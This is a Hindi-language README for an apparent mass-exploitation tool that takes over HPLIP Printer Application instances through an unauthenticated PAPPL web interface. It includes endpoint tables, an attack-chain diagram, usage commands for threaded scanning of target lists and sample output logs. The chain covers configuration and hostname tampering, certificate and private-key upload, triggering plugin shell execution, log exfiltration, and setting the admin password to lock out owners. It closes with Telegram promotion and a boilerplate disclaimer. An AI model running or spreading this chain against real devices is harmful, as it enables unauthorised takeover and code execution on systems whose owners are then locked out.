
HPLIP < 3.26.6 — PAPPL वेब इंटरफ़ेस के माध्यम से पूर्ण एडमिन टेकओवर (कोई प्रमाणीकरण नहीं)। CVE-2026-91097 से CVE-2026-91106 से संबंधित (CVSS 9.3)
🔬 नवीनतम भेद्यता अनुसंधान और एक्सप्लॉइट रिलीज़ के लिए Telegram से जुड़ें
HPLIP Printer Application (PAPPL-आधारित वेब इंटरफ़ेस) को लक्षित करने वाला मास एक्सप्लॉइटेशन टूल, जो 3.26.6 से पहले के सभी HPLIP संस्करणों में काम करता है। यह टूल PAPPL वेब इंटरफ़ेस की डिफ़ॉल्ट अनधिकृत स्थिति का उपयोग करके पूर्ण प्रशासनिक टेकओवर श्रृंखला निष्पादित करता है: कॉन्फ़िगरेशन छेड़छाड़, होस्टनेम संशोधन, TLS प्रमाणपत्र प्रतिस्थापन, HP प्लगइन इंस्टॉलेशन (लक्ष्य पर .run फ़ाइल के शेल निष्पादन को ट्रिगर करता है), सिस्टम लॉग एक्सफ़िल्ट्रेशन, और एडमिन पासवर्ड लॉकआउट।
मुख्य भेद्यता PAPPL अनधिकृत प्रशासनिक पहुँच है — HPLIP Printer Application आता है, जिससे कोई भी नेटवर्क हमलावर वेब इंटरफ़ेस (आमतौर पर पोर्ट 8000) के माध्यम से बिना प्रमाणीकरण के सभी प्रशासनिक कार्य कर सकता है।
इसके अतिरिक्त, प्लगइन इंस्टॉलेशन श्रृंखला उन कमजोरियों का लाभ उठाती है जिन्हें निम्नलिखित में संबोधित किया गया है:
| CVE | CWE | CVSS 4.0 | प्रासंगिकता |
|---|---|---|---|
| CVE-2026-91097 | CWE-94 / CWE-787 | 7.0 | plugin.spec में पाथ ट्रैवर्सल — इस टूल द्वारा ट्रिगर किया गया प्लगइन इंस्टॉलेशन भेद्य pluginhandler.py कोड से गुजरता है |
| CVE-2026-91102 | CWE-78 / CWE-494 | 8.4 | बिना इंटीग्रिटी जाँच के डाउनलोड — प्लगइन .run फ़ाइल HTTP पर डाउनलोड की जाती है और लक्ष्य पर sh के साथ निष्पादित की जाती है |
HP सुरक्षा बुलेटिन: HPSBPI04151
| एंडपॉइंट | क्रिया | सत्यापित |
|---|---|---|
/security | एडमिन पासवर्ड सेट करें (खाता टेकओवर) | ✅ |
/config | DNS-SD नाम, स्थान, संगठन, संपर्क संशोधित करें | ✅ |
/network | सिस्टम होस्टनेम बदलें | ✅ |
/tls-install-crt | मनमाना TLS प्रमाणपत्र + निजी कुंजी अपलोड करें | ✅ |
/plugin | HP प्लगइन डाउनलोड + लाइसेंस स्वीकृति + इंस्टॉल ट्रिगर करें (.run को sh के साथ निष्पादित करता है) | ✅ |
/logfile.txt | पूरी एप्लिकेशन लॉग फ़ाइल पढ़ें (सूचना प्रकटीकरण) | ✅ |
Target Discovery
│
▼
Detect HPLIP Printer Application (Server header + version)
│
▼
Check Authentication Status (/security)
│
├── Password Set ──► Log as VULN (locked)
│
└── No Password (default) ──► Exploit Chain:
│
├── 1. Modify Configuration (/config)
│ dns_sd_name, location, organization, contact_name
│ Verified: marker reflected in response
│
├── 2. Change Hostname (/network)
│ Old hostname captured, new hostname set
│ Verified: new value reflected in response
│
├── 3. Upload TLS Certificate (/tls-install-crt)
│ Custom PEM certificate + private key
│ Multipart file upload
│
├── 4. Install HP Plugin (/plugin)
│ Step 1: POST action=install-plugin (downloads .run)
│ Step 2: POST action=license-accepted (executes with sh)
│ ⚠ CVE-2026-91097 + CVE-2026-91102
│
├── 5. Read Log File (/logfile.txt)
│ System paths, environment info, Snap paths
│
└── 6. Set Admin Password (/security)
Locks out further unauthenticated access
Completes full admin takeover
pip install requests
Python 3.8+ आवश्यक। कोई अन्य निर्भरता नहीं।
python T.py targets.txt 50
| तर्क | विवरण | डिफ़ॉल्ट |
|---|---|---|
targets.txt | लक्ष्य सूची वाली फ़ाइल (प्रति पंक्ति एक) | पूछा जाएगा |
50 | समवर्ती थ्रेड की संख्या | 15 |
python T.py
टूल लक्ष्य सूची फ़ाइल और थ्रेड गणना के लिए संकेत देगा।
192.168.1.100:8000
https://10.0.0.1:8000
http://printer.local:8000
192.168.1.100
printer.example.com
8000 है# से शुरू होने वाली पंक्तियाँ अनदेखी की जाती हैं| फ़ाइल | सामग्री |
|---|---|
AdminS.txt | एडमिन टेकओवर — पासवर्ड, सर्वर संस्करण, पूर्ण पैनल URL मैप |
Nx_modify.txt | सत्यापित कॉन्फ़िगरेशन और होस्टनेम परिवर्तन (पुराना → नया मान) |
Nx_upload.txt | TLS प्रमाणपत्र अपलोड पुष्टिकरण |
Nx_plugin.txt | शेल निष्पादन स्थिति के साथ HP प्लगइन इंस्टॉलेशन परिणाम |
Nx_recon.txt | सूचना प्रकटीकरण — लॉग फ़ाइल आकार, पर्यावरण पथ, संस्करण |
AdminS.txthttp://192.168.1.100:8000 | v3.22.10 | password=Nx-zD_buovl6wko0 | server=HPLIP_Printer_Application/3.22.10-13 PAPPL/1.4.9 | panel=http://192.168.1.100:8000/ | security=http://192.168.1.100:8000/security | config=http://192.168.1.100:8000/config | ...
Nx_modify.txthttp://192.168.1.100:8000/config | v3.22.10 | type=CONFIG | verified=true | dns_sd_name: 'HPLIP Printer Application' -> 'HPLIP [marker]' | location: '' -> 'Nxploited-marker'
http://192.168.1.100:8000/network | v3.22.10 | type=HOSTNAME | verified=true | old=ORIGINAL-HOST.local | new=nx-abc123
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
██████ ██ ██ ██
██ ███ ██ ██ ██
██ ██████ ███
██ █████ ██ ██
██ ████ ██ ██
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
HPLIP Printer Application │ Admin Takeover + Full Control
Affected < 3.26.6 │ PAPPL Unauthenticated Access
CVE-2026-91097 │ Plugin Path Traversal
CVE-2026-91102 │ Plugin Download Without Integrity + Shell Exec
Exploited via Web: /security /config /network /plugin /tls-install-crt /logs
By: Nxploited ( Khaled Alenazi ) │ Telegram: @Kxploit
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
targets=4 threads=4
00:11:34 [CUPS ] http://192.168.1.100:8000 Server: HPLIP_Printer_Application/3.22.10-13
00:11:34 [VER ] http://192.168.1.100:8000 v3.22.10 < 3.26.6 AFFECTED
00:11:35 [PROBE ] http://192.168.1.100:8000 v3.22.10 | NO AUTH | exploiting...
00:11:36 [CFG ] http://192.168.1.100:8000 CONFIG MODIFIED | marker=abc12345
00:11:37 [NET ] http://192.168.1.100:8000 HOSTNAME 'OLD-HOST.local' -> 'nx-xyz789'
00:11:38 [CERT ] http://192.168.1.100:8000 TLS CERT UPLOADED | marker=abc12345
00:12:03 [PLG ] http://192.168.1.100:8000 PLUGIN | freshly_installed | shell_exec=True
00:12:05 [LOG ] http://192.168.1.100:8000 logfile.txt | 19083B | env=/var/snap/hplip-printer-app/
00:12:05 [ADMIN ] http://192.168.1.100:8000 PASSWORD SET | pw=Nx-zD_buovl6wko0
00:12:05 [HIT ] http://192.168.1.100:8000 v3.22.10 + CONFIG + HOSTNAME + CERT + PLUGIN + LOGS + ADMIN
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
DONE 4/4 █ HIT=4 █ VULN=0 █ SAFE=0 █ SKIP=0
▐ Admin Takeover: 4 └─ AdminS.txt
▐ Modifications : 8 └─ Nx_modify.txt
▐ Cert Uploads : 4 └─ Nx_upload.txt
▐ Plugin Exec : 1 └─ Nx_plugin.txt
▐ Recon / Info : 8 └─ Nx_recon.txt
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
| टैग | अर्थ |
|---|---|
HIT | सफलतापूर्वक शोषित — एडमिन टेकओवर प्राप्त |
VULN | भेद्य लेकिन पासवर्ड पहले से सेट (लॉक) |
SAFE | संस्करण ≥ 3.26.6 (पैच किया गया) |
SKIP | HPLIP Printer Application नहीं है या पहुँच से बाहर |
/var/snap/hplip-printer-app/common/ के अंतर्गत संग्रहीत होता हैsh plugin.run --keep --nox11 को ट्रिगर करता है जो HP की आधिकारिक प्लगइन बाइनरी को निष्पादित करता है — सामग्री HP सर्वर से डाउनलोड की जाती है; हमलावर प्लगइन सामग्री को नियंत्रित नहीं करता बल्कि उसके निष्पादन को ट्रिगर करता हैBy: Nxploited
यह टूल कड़ाई से केवल अधिकृत सुरक्षा अनुसंधान, प्रवेश परीक्षण, और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। सिस्टम स्वामी से स्पष्ट लिखित अनुमति के बिना सिस्टम के विरुद्ध इस टूल का उपयोग अवैध और अनैतिक है। लेखक इस टूल के उपयोग से होने वाले किसी भी दुरुपयोग, क्षति, या कानूनी परिणामों के लिए कोई दायित्व नहीं मानता। कोई भी सुरक्षा मूल्यांकन करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें। इस टूल का उपयोग करके, आप सहमत हैं कि आप अपने कार्यों और सभी लागू कानूनों और विनियमों के अनुपालन के लिए पूर्ण रूप से जिम्मेदार हैं।